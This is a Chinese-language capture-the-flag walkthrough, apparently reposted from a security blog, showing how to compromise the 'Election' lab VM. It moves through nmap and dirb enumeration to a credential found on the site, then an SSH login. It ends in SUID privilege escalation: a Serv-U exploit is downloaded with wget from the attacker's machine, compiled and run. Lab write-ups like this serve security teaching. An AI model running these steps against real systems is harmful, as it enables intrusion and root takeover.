Election靶机详解

admin 2025年4月14日19:20:14评论0 views字数 969阅读3分13秒阅读模式

一、主机发现

arp-scan -l
Election靶机详解

靶机ip为192.168.55.147

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.147
Election靶机详解

发现只开放了22和80端口

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.147
Election靶机详解

靶机没有开放UDP端口

2.2目录枚举

dirb http://192.168.55.147
Election靶机详解

扫出来了很多目录,等等尝试访问拿信息

2.3漏洞扫描

nmap --script=vuln -p22,80 192.168.55.147
Election靶机详解

无明显漏洞

2.4指纹识别

nmap 192.168.55.147 -sV -sC -O --version-all
Election靶机详解

三、进入靶机网站寻找信息,拿到低权限账号密码

发现网站只有默认页面

Election靶机详解

去刚刚目录枚举出来的页面进行信息收集

找到类似于目录的文件

Election靶机详解

找到登录框

Election靶机详解

尝试访问目录文件

成功找到新的信息

Election靶机详解

靶机开启后的用户名也是Love,说明此页面有更多的信息,继续枚举一下该网站的目录

dirb http://192.168.55.147/election
Election靶机详解

成功找到账号密码

love
P@$$w0rd@123
Election靶机详解

使用ssh直接连接

ssh [email protected]
Election靶机详解

四、SUID提权

4.1靶机内信息收集

Election靶机详解

该靶机没有定时任务

发现该用户也没有sudo权限

Election靶机详解

继续进行信息收集

4.2SUID提权

搜索suid文件

find / -perm  -4000 -print 2>/dev/null
Election靶机详解

找到了一个特殊文件

注:

Serv-U 是一种被广泛运用的 FTP 服务器端软件,支持多种 Windows 系统,可将 PC 设置成 FTP 服务器,让用户通过 FTP 协议在同一网络的 PC 间进行文件或目录的复制、移动、创建、删除等作。

进入目录查看该文件

Election靶机详解

查看该日志文件

成功找到了版本号

Election靶机详解

去kali中搜索一下历史漏洞

searchsploit Serv-U 15.1

成功找到漏洞

Election靶机详解

然后直接使用该文件进行提权即可

以下内容为kali本机操作
python -m http.server 80
以下内容为靶机shell操作
wget http://192.168.55.132/47009.c
gcc -o 1 47009.c
chmod 777 47009.c
./1
Election靶机详解

提权成功!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):Election靶机详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月14日19:20:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Election靶机详解https://cn-sec.com/archives/3954808.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息